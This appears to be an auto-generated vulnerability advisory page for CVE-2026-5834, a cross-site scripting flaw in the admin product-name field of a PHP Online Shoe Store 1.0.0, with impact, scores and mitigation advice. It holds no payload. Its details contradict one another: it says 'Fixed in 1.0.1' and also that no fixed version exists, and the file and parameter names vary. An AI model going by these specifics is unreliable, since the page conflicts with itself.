Platform
php
Component
online-shoe-store
Fixed in
1.0.1
A cross-site scripting (XSS) vulnerability has been identified in Online Shoe Store version 1.0.0 through 1.0. This flaw allows attackers to inject malicious scripts into the application via manipulation of the productname parameter within the /admin/adminrunning.php file. The vulnerability is remotely exploitable and a public proof-of-concept exists, posing a potential risk to administrative functions.
Successful exploitation of CVE-2026-5834 allows an attacker to execute arbitrary JavaScript code within the context of a user's browser session on the Online Shoe Store application. This can lead to various malicious outcomes, including session hijacking, defacement of the administrative interface, and theft of sensitive data such as user credentials or order information. Given the administrative context of /admin/admin_running.php, an attacker could potentially gain control over the entire store's configuration and data. The public availability of a proof-of-concept significantly increases the likelihood of exploitation.
CVE-2026-5834 is currently considered a low-risk vulnerability due to its CVSS score of 2.4. However, the availability of a public proof-of-concept indicates that exploitation is possible. The vulnerability was disclosed on 2026-04-09. There is no indication of active exploitation campaigns at this time, but the ease of exploitation warrants immediate attention.
Exploit Status
EPSS
0.03% (9% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-5834 is to upgrade to a patched version of Online Shoe Store. As no fixed version is specified, it is crucial to contact the vendor for an updated release. In the interim, implement input validation and output encoding on the productname parameter within /admin/adminrunning.php to sanitize user-supplied data. Consider using a Web Application Firewall (WAF) with XSS filtering rules to block malicious requests. Regularly review access logs for suspicious activity related to the /admin/admin_running.php endpoint.
Update the Online Shoe Store plugin to the latest available version, as this version fixes the Cross-Site Scripting (XSS) vulnerability in the admin_running.php file. Check the plugin source for update instructions or contact the developer for support.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-5834 is a cross-site scripting (XSS) vulnerability affecting Online Shoe Store versions 1.0.0–1.0, allowing attackers to inject malicious scripts via the product_name parameter.
If you are running Online Shoe Store version 1.0.0 through 1.0, you are potentially affected by this vulnerability. Upgrade to a patched version as soon as it becomes available.
The recommended fix is to upgrade to a patched version of Online Shoe Store. Contact the vendor for an updated release. Implement input validation and output encoding as an interim measure.
While there is no confirmed active exploitation, a public proof-of-concept exists, increasing the risk of exploitation.
Refer to the Online Shoe Store vendor's website or security advisory page for the official advisory regarding CVE-2026-5834.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.